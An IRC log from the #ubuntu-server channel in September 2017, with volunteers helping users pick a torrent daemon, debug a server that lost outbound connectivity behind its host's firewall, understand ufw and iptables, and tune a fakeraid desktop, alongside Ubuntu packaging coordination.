<m0ltar> I found the broken commit and commented on it
<m0ltar> Not gonan open a jira account for this
#ubuntu-server 2017-09-25
<lordievader> Good morning
<albech> good morning. Looking for a bittorrent client with a webui front that can be run on my server.
<hateball> albech: Transmission
<hateball> You can also connect with the desktop app if you like
<albech> hateball: interesting always thought transmission was only a desktop app
<albech> was looking at deluge, but it seems a bit bloated for what we need
<hateball> Nope, you can run transmission-daemon
<albech> need to sync large data sets via torrent between 8 sites
<hateball> I was going to suggest Deluge also, but I personally left it due to being too fat
<hateball> (I run torrents on RPi)
<albech> hateball: nice
<hateball> Transmission even has an ncurses interface iirc
<oerheks> deluge a bit bloated ??
<albech> oerheks: i have only looked at their website..
<albech> hateball: would be nice with some daemon as you said so the process can be automated. We are looking at ~200tb data in smaller chunks.
<albech> and the number of locations will go up to 16+ over the next year.
<hateball> albech: there is of course rtorrent
<hateball> but I dunno if that has a webgui
<hateball> Seems this exists https://github.com/jfurrow/flood
<albech> interesting.. id hate to bloat something which really isnt needed.. will have a look at that too.. Cheers and thanks a ton
<hateball> albech: https://help.ubuntu.com/community/TransmissionHowTo
<roaksoax> ~/win 8
<dpawlik> coreycb: I check your package
<dpawlik> python-oslo.middleware
<dpawlik> from pike repo on Openstck ocata release
<dpawlik> and I can say: it works and all basic comands also
<dpawlik> like nova list, neutron net-list etc
<dpawlik> coreycb: Is possible to move from pike to ocata staging pliz :) ?
<danpawlik> coreycb: pls let me know if you receive messages :)
<coreycb> danpawlik: hi, i just poked in #ubuntu-devel to ask for sru review
<danpawlik> BTW good that puppet integration tests doesn't test nova policy.json :P
<danpawlik> coreycb: ^^
<danpawlik> coreycb: because if it test, it should raise an error :)
<coreycb> danpawlik: is there a bug?
<danpawlik> coreycb: yup. Puppet is crying that it can not apply new rules on policy.json because.. File is available
<danpawlik> but I think this bug should be resolved by puppet side
<coreycb> Ok if there's a bug in the package please let me know
<danpawlik> coreycb: sure :)
<danpawlik> coreycb: If puppet community will not accept my PS
<danpawlik> I will come to you :)
<coreycb> danpawlik: why can't it apply new rules to the policy.json? is this something to-do with in-code policy defaults?
<coreycb> danpawlik: it looks like we dropped the policy.json in ocata since default policy is registered in code.
<danpawlik> coreycb: Not in-code policy defaults, but... in puppet. Puppet want to save new policy rules in policy.json but it can not find the file so it raise an error. Normall touch /etc/nova/policy.json is resolving the problem
<danpawlik> so I will do that in puppet module
<danpawlik> if patch set will be not accepted by puppet community, we should consider create the file
<danpawlik> it can be empty
<danpawlik> coreycb: but for now I try to do that in puppet module
<coreycb> danpawlik: if a file is required then i think that would be a bug upstream for nova
<coreycb> danpawlik: i thought the point was to not require the file unless overriding defaults
<danpawlik> coreycb: I think most of puppet cores/reviewers did not know that such problem is
<danpawlik> coreycb: I can say, you found a bug in puppet-nova module :)
<danpawlik> and puppet-integration tests
<coreycb> danpawlik: ah ok, good luck :)
<rbasak> nacc: chatted with Colin and he suggested a commit graph change for pocket copies (will cause hash-abi-break). I need to think it through since I previously didn't think we could do what he suggests, but probably worth a sync with you (HO?) so you can think about it too.
<rbasak> In short: he doesn't think that pocket copies necessarily need their own commits and we should just be able to move forward the branch pointer in most cases.
<rbasak> I can't remember my logic for not doing that.
<rbasak> It might be that it may then appear that the pocket previously had something that never got published.
<rbasak> But Colin pointed out that it would appear like that anyway because of eg. changelog parents.
<nacc> rbasak: pocket copies that establish a new pocket?
<rbasak> Couldn't we just create a branch pointer at the import tag in that case?
<nacc> rbasak: i'm asking what pocket copy you are referring to?
<rbasak> Oh
<rbasak> Any time the importer processes a Launchpad publication that already has an import atg.
<nacc> rbasak: sorry. Yes, I understand what a pocket copy is. "necessarily need their own commit" implies the parenting is the same.
<nacc> rbasak: and that would oly be true for a pocket copy where this is no publishing parent
<rbasak> Ah
<rbasak> Yes, that's it. We need to add a publishing parent.
<rbasak> Thanks. I'll explain to Colin and see what he thinks.
<rbasak> Hmm.
<rbasak> What if we didn't add a publishing parent, and just move the branch pointer up assuming it's fast-forwarding?
<rbasak> That'd lose the reflection of publishing history in the commit graph I suppose.
<rbasak> Though that reflection is only available manually, since we don't have a good way of identifying the different types of parent except in the commit message.
<rbasak> If we did this, would fast forwarding be possible most of the time?
<nacc> rbasak: sorry, i'm deep in snapping right now
<rbasak> np
<nacc> do you want to put a HO on the cal for an hour from ow?
<nacc> *now
<nacc> so i can context switch
<nacc> rbasak: or whenever later today
<rbasak> I'm not sure I can get away right now. Later is fine - no need for you to context switch. I just wanted to make you aware of the discussion.
<nacc> rbasak: +1
<nacc> rbasak: tbh, I *think* we did what you are suggesting originally. But there were some corner cases that simply didnn't work
<rbasak> That's the impression I got. I'd like to figure out what they were again and run them past Colin :)
<nacc> yep
<rbasak> In our discussion it was one of the first suggestions we made. Then as our discussion continued there were a few scenarios that came up where it would clearly be better if the commit graph appeared that way for those use cases.
<rbasak> s/we/he/
<nacc> yeah, it's possible also as we've solidified the rest of the algorithm, it's doable now
<Epx998> is there a different log aside from syslog to see why a system is read only?
<sarnold> dmesg?
<sarnold> journalctl?
<sarnold> serial console? early printk?
<Epx998-> hmm
<RoyK> Epx998-: which filesystem is it that's read only?
<nacc> cpaelzer: rbasak: are people using git-{merge,reconstruct}-changelog from the snap?
<cpaelzer> nacc: people = ?
<cpaelzer> nacc: I do
<cpaelzer> well OTOH no merges for a while now
<nacc> cpaelzer: you use those tools and not `git ubuntu merge` ?
<cpaelzer> nacc: no
<cpaelzer> nacc: I use git ubuntu X and thought that is using the things from the snap for me as needed
<cpaelzer> I'm not like calling into the snap's binaries if that was the queston
<nacc> cpaelzer: no, I believe someoe (you? :) asked they be there while merge was in-progress
<nacc> yeah
<nacc> i think i am going to drop them from the snap (for now), so I can focus on getting git-ubunntu working
<rbasak> nacc: +1
<nacc> rbasak: thanks, urgent questionn for you: what is the setuptools way to isntall our hooks? :)
<nacc> rbasak: the snap is now using the python3 plugin, which is working great (and fixes a bunch of other issues), but now git-ubuntu won't find hooks (as it's looking in /snap/git-ubuntu/x1/lib/python3.5/site-packages/gitubuntu/../hooks)
<nacc> rbasak: oh i see i can 'organize' it into our snap
<nacc> but i don't think we want it at lib/python3.5/site-packages/hooks ?
<rbasak> I'm not sure I know what these hooks are :-/
<rbasak> Is this a setuptools thing?
<nacc> rbasak: they are your hooks for empty directories
<nacc> that get isntalled on every clone
<nacc> rbasak: i think if i mv them to gitubuntu/ and make them a pkg_resource, then it will dtrt
<nacc> testing it now
<nacc> rbasak: w00t, hooks are now a resource and ship with setup.py properly (as do our txt files)
<rbasak> Ah
<rbasak> Nice. Thanks!
<rbasak> nacc: are you provisionally available for a HO at 2000 UTC (~45 minutes I think)?
<nacc> rbasak: yes
<nacc> rbasak: i'm here whenever you are ready
<rbasak> nacc: omw
<nacc> rbasak: standup HO?
<rbasak> ack
<Epx998> nub question - is there a single line command for adding users to sudo?  without going into an editor?
<sdeziel> Epx998: adduser foo sudo
<Epx998> easy enough, there a NOPASSWD option that can be passed too?
<sdeziel> Epx998: no as the above simply joins the foo user to the sudo group and this group is by default prompted for password when elevating privileges
<Epx998> yeah thats good nuff for me
<Epx998> team getting these servers can fix their own sudoers file after the fact
<Epx998> ill just make sudo "work"
<qman__> Epx998: you can craft specific sudoers files and put them in /etc/sudoers.d/
<qman__> so you don't have to modify the system file
<RoyK> Epx998: just edit sudoers or script it
<RoyK> Epx998: shouldn't be that hard
<RoyK> Epx998: ansible's lineinfile will do it easily, or use groups as mentioned above
<Epx998> im adding as much as i can to the preseed, i dont want to touch anything after the fact
<Epx998> they want 2 users, so i added a late command to add the 2nd account, with sudo i hope
<RoyK> Epx998: for two users, merely editing a sudoers file manually can't be too hard
#ubuntu-server 2017-09-26
<AegonTarg> What's a good use for my ubuntu server? (16.04). I've already setup an email server, web server, VPN, game server. I want a cool project for my apartment, like sensors or something. Not sure what though.
<AegonTarg> like for example, a temperature sensor that I post to my server and I can read the values from anywhere across the internet.
<andol> AegonTarg: Sounds like you already have an idea, like in that senor setup you described? :)
<AegonTarg> andol, I already did that haha.
<AegonTarg> not sure what else to do..
<andol> AegonTarg: Jukebox?
<AegonTarg> andol, oh it's a cloud server.
<AegonTarg> lol
<andol> Ahh, just assumed a local physical server when you started talking about sensor.
<andol> AegonTarg: In that can I think you should use it to setup your own DNS server, letting it be the DNS master, and using a hosted service for DNS secondaries.
<andol> AegonTarg: Running DNS yourself might not always be the most effective solution, but it's a good learning experience, and properly understanding DNS is a good thing.
<AegonTarg> andol, honestly I'm not entirely sure how DNS works. Like I always assumed the ISP's regulated who gets what domain name based on the DNS registrats
<AegonTarg> registars*
<andol> AegonTarg: Time to start figuring it out then :-P
<andol> Way too common that people kind of know what DNS does, without any understanding about how the different pieces fit together.
<AegonTarg> andol, I've tried looking it up but never can get a clear answer.
<AegonTarg> So basically I could get a domain name "helloworld.org" for free by hosting my own DNS server
<AegonTarg> Or basically do I still need to register it (which costs money) and all I'm doing is serving the IP address that points to the domain name?
<andol> AegonTarg: There are two different aspect here, the DNS name delegation and the acutal DNS hosting
<andol> AegonTarg: No matter what, the .org top domain (registry) will need to delegate the example.org domain to you. For that there is a free. The top domain registries don't deal directly with "customers", but rather you have to deal with a reseller, in this case a registrar.
<andol> AegonTarg: Then there is the DNS hosting, when the .org top domain delegates the example.org domain to you it does that by telling the world which authorative DNS-servers are resposible for the example.org domain.
<andol> AegonTarg: It's not uncommon for registrars to also provide the service of DNS hosting, but technically that is a different service.
<andol> AegonTarg: So yes, you will need to pay a registrar for the example.org domain, and then you can use the registrar to communicate with the .org top domain that your DNS server(s) are resposibly for the example.org domain.
<AegonTarg> andol, ah alright, that explains it a bit.
<AegonTarg> Still not sure if I want to do a DNS server though, I don't really need one honestly.
<lordievader> Good morning
<andol> AegonTarg: Nope, unless you plan to do any special integrations, or have other special requirements, there is very little reasons to run your own DNS server, except for the learning experience.
<AegonTarg> andol, ok thank you!
<albech> been trying to route traffic back through the interface where the connection is established on, but with no luck. I have a setup with three interfaces. eth0: internal network in the DC, eth1: external interface with static ip, tun0: vpn interface over eth1, which is used as default gw. I wish to route connections coming to eth1 back through eth1 and not via default gw. I have looked at https://unix.stackexchange.com/questions/4420/reply-on-same-inter
<albech> but it isnt working as expected.
<albech> not sure if rp_filter should be off for this, but i have already tried without success.
<dpb1> https://trello.com/b/E0g6etCl/1709-retrospective
<dpb1> whoops, wrong channel, that's not publicly visible
<coreycb> jamespage: beisner: hello, can you promote python-oslo.middleware 3.30.0-0ubuntu1.1~cloud0 to pike-proposed please?
<coreycb> jamespage: beisner: and also the point release in newton-staging is ready to promote to newton-proposed.
<DannyS> Hi everyone, I am having an issue on my Ubuntu server 14.04 where I can't seem to ping anything, nothing works, I can't download packages, or ping google.com or even ping 8.8.8.8
<DannyS> Any help? I have looked online and did everything online says, but nothing is working
<DannyS> I think there is some issue with DNS resolution
<maswan> if ping to an ip doesn't work, it's networking, not DNS
<maswan> https://help.ubuntu.com/lts/serverguide/network-configuration.html
<maswan> might have some help
<DannyS> maswan: I get this: eth0      Link encap:Ethernet  HWaddr 4c:72:b9:d2:c0:8a
<DannyS> ifconfig -a | grep eth
<DannyS> But I can connect to the network, and my websites and that work...
<DannyS> But nothing can resolve internally? maswan
<maswan> but you just said that you couldn't ping IPs
<maswan> anyway, both IP addressing and resolving is on there
<DannyS> maswan: This is already configured correctly, everything seems to show right...?
<DannyS> Like eth0 shows it using multicast DNS?
<DannyS> maswan: So when I try and ping google.com it doesn't work, my website is still showing, my connection is still working and all of it works still... but nothing can resolve locally, therefore applications just error, like my game server won't allow connections, my IRC bouncer keeps telling me disconnected, could not resolve host.
<DannyS> Can't download packages, anything that requires a lookup fails
<DannyS> If I give someone like access can they look? Like i am honestly done with this... I can't understand what is wrong
<albech> DannyS: will 'dig google.com' work?
<DannyS> I don;t know enough about networking, and all the posts I have followed, or config I have looked at and made sure mine is the same, nothing works.
<DannyS> albech: Will look
<DannyS> albech: Doesn't do anything, just hangs
<albech> DannyS: then try 'dig @8.8.8.8 google.com
<DannyS> ; <<>> DiG 9.9.5-3ubuntu0.16-Ubuntu <<>> @8.8.8.8
<DannyS> google.com ; (1 server found) ;; global options: +cmd ;; connection timed out; no servers could be reached
<DannyS> albech: Nope, I get this: ^
<sarnold> how about ip route get 8.8.8.8
<DannyS> Sorry what do you mean?
<DannyS> sarnold: ^
<albech> looks like a routing issue
<sarnold> what is the output from running the command "ip route get 8.8.8.8"
<DannyS> sarnold: I get this: ip route get 8.8.8.8 8.8.8.8 via 192.168.1.1 dev eth0  src 192.168.1.178  cache
<sarnold> DannyS: okay, ping 192.168.1.1
<DannyS> Same issue as pinging IPs, just hangs?
<DannyS> sarnold: ^
<sarnold> d'oh
<albech> hmm
<sarnold> how about ping -n 192.168.1.1
 * sarnold smacks self
<DannyS> sarnold: Same issue, just hangs
<DannyS> All I did was reboot the server >.<
<albech> DannyS: and you are chatting with us through the same router?
<DannyS> albech: No, I am on my computer, I am ssh'd into my server
<DannyS> I can't use my IRC bouncer anymore, as it just disconnects me because can't resolve host
<patdk-lp> rogue dhcp server :) those are the best :)
<DannyS> I will happily give access if it will make it easier?
<patdk-lp> how will give access work when you don't have a working network?
<DannyS> patdk-lp: I am SSH'd into the server...
<AureliusO> DannyS, what does iptables -L look like?
<DannyS> AureliusO: It's big, let me put it on a paste
<albech> DannyS: ahhh..
<AureliusO> I smell ufw muckery.
<DannyS> Oh?
<albech> Indeed
<DannyS> http://git.dannysmc.com/snippets/45
<sarnold> i suspect icmp hsa been blocked somewhere
<sarnold> and maybe udp too
 * patdk-lp smells begals!
<sarnold> oh damn I want bagels
<patdk-lp> haven't been able to use irc for months :(
<DannyS> AureliusO, sarnold: I linked the output above.
<patdk-lp> technically stil lcan't, too busy, but ignoring work
<albech> patdk-lp: get to work! ;)
<DannyS> Anyone? Anything? Please :(
<AureliusO> Reading the mess, sec.
<DannyS> AureliusO: Ahh, is it that bad? :/
<DannyS> I just use ufw, because not sure about the whole iptables thing
<AureliusO> Nah, reading ufw is just a lot of back and forth jumping.
<patdk-lp> heh?
<patdk-lp> it looks perfectly fine
<patdk-lp> didn't take much to verify it at all
<sarnold> how the heck did you read 16k of rules so quickly? :D
<patdk-lp> you don't need to
<patdk-lp> you just follow it till you hit, ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
<patdk-lp> then the rest doesn't matter
<patdk-lp> atleast for our purposes
<patdk-lp> and everything before that is empty so
<DannyS> So no one has said anything? Is my iptables correct? or?
<DannyS> Sorry I don't mean to come across rude, just networking is something I don't know, so not really sure what is happening.
<patdk-lp> ok, read it all, not interesting :)
<jamespage> coreycb: do you still need that stuff promoting?
<patdk-lp> how that doesn't mean something with nat isn't screwed up, or in pre-routing
<coreycb> jamespage: yes please
<DannyS> So if I give someone SSH access maybe they can look? or someone can tell me commands I need to run? Honestly very grateful for the help already
<jamespage> coreycb: ok doing that now
<coreycb> jamespage: thanks
<coreycb> jamespage: horizon can also be promoted to newton-proposed
<jamespage> coreycb: looking
<DannyS> AureliusO: ?
<AureliusO> Unless an interface is specified incorrectly somewhere, the iptables set is fine, as patdk-lp said.  Still odd that 192.168.1.1 isn't reachable.
<patdk-lp> I really don't get those user-input rules though, so much crap opened that shouldn't be
<jamespage> coreycb: and for pike as well
<DannyS> patdk-lp: I have a lot of game servers, that run on different ports
<patdk-lp> you have something on udp port 22?
<patdk-lp> udp port 80 and 443?
<coreycb> jamespage: yeah probably. i uploaded horizon for mitaka->pike. still need to upload kilo but was having troubles building it with .egg issues.
<DannyS> Errr? I have a web server? git server? game servers? nodejs applications?
<sarnold> DannyS: try nmap -sT or nmap -sU from this server to your router to see if you can reach it via nay other mechansisms
<patdk-lp> DannyS, yes, but what about any of that uses udp?
<DannyS> patdk-lp: I wouldn't think so, not sure, might need to clear all my rules and start again, if that;s the case
<DannyS> sarnold: nmap -sT comes back with: Starting Nmap 6.40 ( http://nmap.org ) at 2017-09-26 15:27 BST WARNING: No targets were specified, so 0 hosts scanned. Nmap done: 0 IP addresses (0 hosts up) scanned in 0.05 seconds
<sarnold> DannyS: nmap -sT 192.168.1.1  ?
<DannyS> sarnold: Starting Nmap 6.40 ( http://nmap.org ) at 2017-09-26 15:28 BST mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 0.51 seconds
<sarnold> jeezus nmap just do what I mean!
<DannyS> sarnold: ?
<AureliusO> Even though we can't see anything wrong, part of me still wants to tell him to put in input & output rules to just blindly accept from his gateway and test again
<sdeziel> DannyS: "tcpdump -ni eth0 not port 22" should tell you if ARP is working
<jamespage> coreycb: do you want me to promote all of the new newton point releases to newton proposed as well?
<coreycb> jamespage: yes
<AureliusO> DannyS, iptables -t nat -L -v
<AureliusO> DannyS, also, just to be sure, iptables -L -v
<sarnold> DannyS: alright try nmap -sT -n -Pn 192.168.1.1
<DannyS> sdeziel: I get a lot of content coming through?
<DannyS> AureliusO:
<sdeziel> DannyS: well, I just realized that your were connected by SSH so that was a moot point, sorry
<DannyS> sdeziel: No worries!
<DannyS> AureliusO: http://git.dannysmc.com/snippets/46
<DannyS> AureliusO: http://git.dannysmc.com/snippets/47
<DannyS> That's both the commands you sent me
<DannyS> sarnold: Seems to be hanging?
<DannyS> sarnold, AureliusO tell me what you think
<sdeziel> DannyS: "arp -na | grep -F 192.168.1.1"
<DannyS> sdeziel: ? (192.168.1.1) at 00:07:b4:00:01:01 [ether] on eth0
<sdeziel> DannyS: OK, so that's not the problem
<DannyS> Errrr
<DannyS> Anyone want access? haha
<DannyS> Might be easier to get information?
<patdk-lp> DannyS, ping 96.83.110.228
<DannyS> patdk-lp: Just hangs, doesn't do anything
<DannyS> patdk-lp: When I close it: 12 packets transmitted, 0 received, 100% packet loss, time 11011ms
<sarnold> DannyS: it might take forever..
<DannyS> sarnold: What will take forever?
<patdk-lp> do it again
<sarnold> DannyS: nmap
<DannyS> Doing it again
<patdk-lp> i see nothing at all, odd
<patdk-lp> reboot your router/firewall/gateway
<DannyS> ufw?
<patdk-lp> is it one of those home device things?
<DannyS> No this is at a hosting company
<patdk-lp> using a private ip block?
<DannyS> patdk-lp: They verified it's nothing on their end
<DannyS> and yes I assume so?
<DannyS> I have 2 dedicated IPs
<DannyS> sarnold: Nothing is happening, shall I just leave it running?
<DannyS> sarnold: IT FINISHED!
<DannyS> sarnold: Starting Nmap 6.40 ( http://nmap.org ) at 2017-09-26 15:39 BST Nmap scan report for 192.168.1.1 Host is up. All 1000 scanned ports on 192.168.1.1 are filtered Nmap done: 1 IP address (1 host up) scanned in 201.28 seconds
<sarnold> DannyS: what's the firewall on 192.168.1.1 doing?
<DannyS> sarnold: How do I find out?
<sarnold> DannyS: log in to 192.168.1.1's administrative interfaces and look around
<AureliusO> sarnold, sounds like is the hosting company's gateway -- he might not get to know
<DannyS> sarnold: It's my hosting company, I don't have access sorry
<sarnold> ahh
<sarnold> are there "security groups" there that might be tweakable?
<AureliusO> Something doesn't add up here.  The iptables rules are fine, inbound traffic is apparently working OK, related outbound is working or SSH wouldn't do anything...
<DannyS> sarnold: Well I wouldn't think so, but I can't see how this would be an issue? As it's worked before? It's not like a new server, it's just stopped working since I deleted /var/cache and restarted
<DannyS> the server before had been running for over 3 months non stop
<DannyS> With many packages being installed etc
<DannyS> So idk
<DannyS> AureliusO: Shall I give you a sudo user? so you can look around?
<sarnold> it sure feels like icmp and udp is being blocked _somewhere_
<DannyS> sarnold: Again, shall I give access?
<sdeziel> dig +tcp @8.8.8.8 google.com
<patdk-lp> accesss isn't going to solve anything
<DannyS> patdk-lp: So I don't understand? What am I supposed to do?
<patdk-lp> if we knew, we would have solved this long ago
<AureliusO> DannyS, realistically, you have told us everything we would want to derive from having access -- it's more of a "what's next" thought right now.
<sarnold> DannyS: the thing is I just don't have the time to dedicate to it :( just poke in ideas from time to time..
<patdk-lp> we didn't setup your server, setup your network, setup your hosting provider
<patdk-lp> there is only so much we can do
<DannyS> sarnold, AureliusO I see, so not really any way of fixing it?
<sarnold> no, just that it might take more time and effort than I can dedicate
<patdk-lp> given your server is working fine on the local network
<patdk-lp> but it's firewall and routing are ok, and arp works
<patdk-lp> the next step is to check the firewall/router
<patdk-lp> but we cannot do that
<DannyS> Oh :( who can? xx
<AureliusO> You should get your hosting company on the phone and get someone who can capture traffic at or after 192.168.1.1 and see if they can find where your pings are being dropped
<DannyS> ignore xx
<patdk-lp> your hosting provider, but they said it is working fine you said
<AureliusO> The fact that patdk-lp was unable to see the INCOMING ICMP traffic is pretty telling.
<sdeziel> DannyS: could you tell us one of the 2 dedicated IPs that server has? And also which service should be publicly accessible?
<albech> seems rather strange that a hosting company would be using 192.168.1/24 for their clients
<sarnold> hehe that's part of why I assumed the router was DannyS's :)
<AureliusO> albech, depending on the company it could be as little as 1 or 2 people operating as a reseller -- that's not odd for some game hosting companies.
<AureliusO> They don't tend to be *too* savvy themselves.
<AureliusO> In that case, of course.  There are plenty who are very good & technical.
<hateball> there's also cg-nat these days
<DannyS> SoYouStart is the company reseller of OVH
<patdk-lp> cgnat has it's own ip block, that isn't it
<danpawlik> coreycb: Hello
<danpawlik> coreycb: Do you recognize https://bugs.launchpad.net/puppet-gnocchi/+bug/1687235   zhongshengping ?
<ubottu> Launchpad bug 1687235 in puppet-gnocchi "Package gnocchi-indexer-sqlalchemy does not exist on Ubuntu" [High,In progress]
<coreycb> danpawlik: i've not seen that but it seems we should add that binary package
<danpawlik> coreycb: yes... Should I create a task for it? Or maybe I can push some proposal?
<coreycb> danpawlik: i've added a task to that bug
<danpawlik> coreycb: thanks!
<DannyS> sdeziel: 94.23.41.101
<sdeziel> DannyS: what service/port should I be poking?
<DannyS> You can poke port 80
<DannyS> That seems to work still
<sdeziel> DannyS: FYI, I can ping and reach your HTTP server
<sdeziel> DannyS: really looks like a misconfigured firewall upstream to your machine. As if the firewall would not let you initiate outbound connections
<beisner> coreycb: promoted newton to uca proposed for point release.  the oslo middleware pike one looks like it's already done.
<coreycb> beisner: \o/
<danpawlik> :D
<DannyS> sdeziel: No idea what to do, but thanks
<sdeziel> DannyS: I'd bring that info to the attention of the hosting provider/firewall manager
<DannyS> sdeziel: Will let them know
<mike-zal> maybe some will explein it to me. ufw is installed but not enabled. however IP tables do have some rules and virtualmin shows them as active. does it mean that firewall runs? I kinda am confused without ufw.
<sarnold> I think iptables -L is probably your best source of truth
<nacc> ufw = frontend for iptables, iirc
<nacc> "The Uncomplicated FireWall is a front-end for iptable"
<sarnold> it is
<sarnold> but if you use a different tool to manage the firewall then I wouldn't rely upon ufw's output to tell you much about iptables or the other tool
<hateball> mike-zal: maybe you are using fail2ban ?
<tomreyn> or virtualbox, vmware workstation, lxc/lxd/docker or some other kind of virtualization / containerization
<tomreyn> "sudo iptables-save" may provide a better idea of what the existing policies are for (than "sudo iptables -L").
<nacc> sarnold: good point
<mason> /etc/network/interfaces "up /etc/network/rules" FTW.
<mike-zal> thanks sarnold, iptables -L does show rules so it seems to be active. I am asking, because now when I use virtualmin, I don't need ufw, since virtualmin shows and manage rules.
<mike-zal> hateball: yes, I am using fail2ban
<hateball> mike-zal: maybe it has created some rules then
<mike-zal> probably. I was learning how it all works, but a friend recommended me virtualmin and it really is awesome, but in a way I must learn things anew.
<mike-zal> however, it's less likely I screw something ;)
<mike-zal> also, I'm quicker and more effective with gui then with terminal, so such solution is working for me
<mike-zal> so, are iptable rules active by default on clean ubuntu server install?
<hateball> There's not a single rule, no
<mike-zal> I always thought I need to enable and set ufw and that was what I did before
<mike-zal> I mean on a clean ubuntu server install, 16.04
<hateball> iptables itself is active as it is part of the kernel, but there are no rules
<mike-zal> ah, ok
<mike-zal> thanks, that clarifies things for me
<mike-zal> a new question. can sql file be password protected somehow? doing some backups and having sql files seems to be a voulnerability
<hateball> tar it, compress it, encrypt it
<hateball> up to you
<mike-zal> has tar a password option? will have to investiage it. encrypting also sounds a good idea, although I just don't know anything about it but that can be changed ;)
<nacc> rbasak: excellent, dpkg-parsechangelog between x and a behave differently
<nacc> rbasak: which means i need to build dpkg from source too
<sarnold> mike-zal: yeah you can use whatever frontend you like for iptables :) ufw is simple and works for a lot of people but whatever works
<sarnold> mike-zal: gpg -c is a good way to password protect a file
<mike-zal> sarnold: thanks, noted
<trippeh> strange, systemd-timesyncd isnt synchronizing, the ntp requests and responses show up in tcpdump and timesyncd logs nothing.
<sarnold> :(
<trippeh> # /lib/systemd/systemd-timesyncd --help
<trippeh> This program does not take arguments.
<trippeh> helpful ;)
<rbasak> nacc: :-(
<nacc> rbasak: and ... might have found another bug in snapcraft :/
<rbasak> nacc: perhaps add a test to check that we are getting the right side of the difference?
<nacc> rbasak: yeah, I'll do that
<rbasak> nacc: git-ubuntu dev discussion with Launchpad team in half an hour (1500 UTC). Would you like to join via HO?
<nacc> rbasak: i am going to be at lunch
<rbasak> np
<powersj> rbasak: nacc: how well do you know the launchpad api?
<powersj> Currently running into the following: https://paste.ubuntu.com/25618073/
<powersj> which had been working
<powersj> In the past I got a single result for the artful release
<rbasak> powersj: not sure. Try #launchpad?
<powersj> ok filed LP: #1719715
<ubottu> Launchpad bug 1719715 in Launchpad itself "getDevelopmentSeries fails to find a series" [Undecided,New] https://launchpad.net/bugs/1719715
<rbasak> nacc: bug 1719715 (probably Invalid) is relevant to git-ubuntu also I think.
<ubottu> bug 1719715 in Launchpad itself "getDevelopmentSeries fails to find a series" [Undecided,New] https://launchpad.net/bugs/1719715
<coreycb> jamespage: opened a bug for pike point release: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1719728
<ubottu> Launchpad bug 1719728 in nova (Ubuntu Artful) "[SRU] pike stable releases" [Undecided,New]
<nacc> rbasak: maybe, we don't use it
<nacc> rbasak: we use current_series directly
<nacc> rbasak: dpb1: do you have time for a HO?
<nacc> rbasak: fyi, we have a c-m with tomcat8 now
<nacc> dpb1: --^
<nacc> it's on my todo to fix
<nacc> (as a new mir team member)
<nacc> component mismatch
<nacc> to whoever just asked :)
<Jenshae> Hello everyone.
<coreycb> beisner: can you promote horizon 1:2015.1.4-0ubuntu3 to kilo-proposed please?
<beisner> coreycb: thanks.  promoted that^
<Jenshae> I tried many flavours of the debian branch, debian itself, ubuntu desktop, xubuntu, lubuntu and so forth. To get a SATA fakeraid RAID 5 to work, I have resort to using Ubuntu desktop for two PCs and I am also using it instead of Kubuntu server (same bug) for an archive server I am building.
<Jenshae> https://www.mail-archive.com/ubuntu-bugs@lists.ubuntu.com/msg5172827.html
<Jenshae> On the desktops, having GUIs installed, I am finding them slow to respond and unstable.
<Jenshae> On the archive server, I have left it as a command prompt for now and I don't know what to do with it. :D
<Jenshae> I saw something about elevator=noop for something to do with data packets to and from the drives, which might be causing the PC's response lag.
<Jenshae> Does anyone here have some good guides on either working around that bug or on how to convert a ubuntu-server into a gaming installation?
<sarnold> elevator=noop is recommended for disks that ZFS controls because ZFS already does internal io scheduling tasks
<Jenshae> What is ZFS?
<sarnold> other filesystems would probably benefit from one of the other schedulers that knows how to handle rotational disks or ssds or whatever
<Jenshae> The last time I fiddled with server versions was Kubuntu server 7 about a decade ago.
<Jenshae> I have three SSHDs in this machine
<Jenshae> Lubuntu-desktop seems the most responsive and stable.
<sarnold> ZFS is a combined storage system that is sort of like LVM / RAID controllers married directly to the filesystem, with end-to-end checksums, configurable redundancy, etc.
<Jenshae> As I say that and hit Enter, there is a half second freeze before it sends my message to you.
<Jenshae> Thank you, that makes some more sense.
<sarnold> that sounds intolerably bad
<sarnold> actually figuring out what needs to be changed might be difficult
<Jenshae> It isn't freezing while I type at least :D
<sarnold> i'm on one side of the contry typing into a shell o the other side of the conutry and the latency is ~140 ms tops.
<sarnold> 80ms. even better than I expected. :)
<sarnold> especially since there's wifi involved...
<sarnold> so 500ms is outright terrible.
<Jenshae> Yeah, wifi. Hate that stuff, number of people that I try and convince to get an ethernet cable ...
<Jenshae> So, what would I need to run? I think there was a command, hdparm or something that shows the transfer rates of the HDs?
<sarnold> I like iostat -dmx 1
<sarnold> well, I _love_ zpool iostat -v 1
<sarnold> but if you're not running zfs it's not going to be useful :)
<Jenshae> I don't know what I am running.
<Jenshae> This machine has the raw Ubuntu Server install without any additions like Samba server and then I have slapped multiple desktops on it.
<Jenshae> Standard Intel Bios RAID config.
<Jenshae> 3x Seagate FireCuda Laptop 500GB 2.5" Hybrid Hard Drive - SSHD 7mm (I somehow screwed up and got 2.5" instead of 3.5" (I have insomnia and sleep deprivation problems so I do some bizarre things))
<Jenshae> What do I run to see if I am using ZFS?
<sarnold> you'd know if you were using it :)
<Jenshae> https://wiki.ubuntu.com/ZFS
<sarnold> it still takes some effort ot use zfs on linux these days
<Jenshae> Hazarding your best guess, can I just slap that in now, post installation?
<sarnold> here's a series of blog posts about ZFS that got me started https://pthree.org/2012/12/04/zfs-administration-part-i-vdevs/
<Jenshae> It has taken me three weeks of testing flavours to end up on Ubuntu Server so I am persistant.
<Jenshae> Thank you
<sarnold> you certainly could move to ZFS but that would take some effort -- new drives would be the easiest way to get there.
<Jenshae> These have nothing valuable on them. Can wipe the RAID and start again at any point.
<sarnold> RAID controllers are usually rubbish. soft-raid doubly-so :(
<Jenshae> You recommend Soft Raid over fake raid?
<Jenshae> Would a hardware RAID controller get around the desktop bug?
<Jenshae> I am seeing a performance boost ... when I don't get a lag spike.
<trippeh> heh, so re earlier, the home ntp server had gone off the rails, claiming accuracy of +/- 18 seconds
<Jenshae> It feels like the machine sometimes waits for enough data in RAM before writing it to the drives or reading from them or something.
<sarnold> trippeh: 18 seconds??? ouch
<trippeh> sarnold: yeah. everything looked fine in chronyc sources
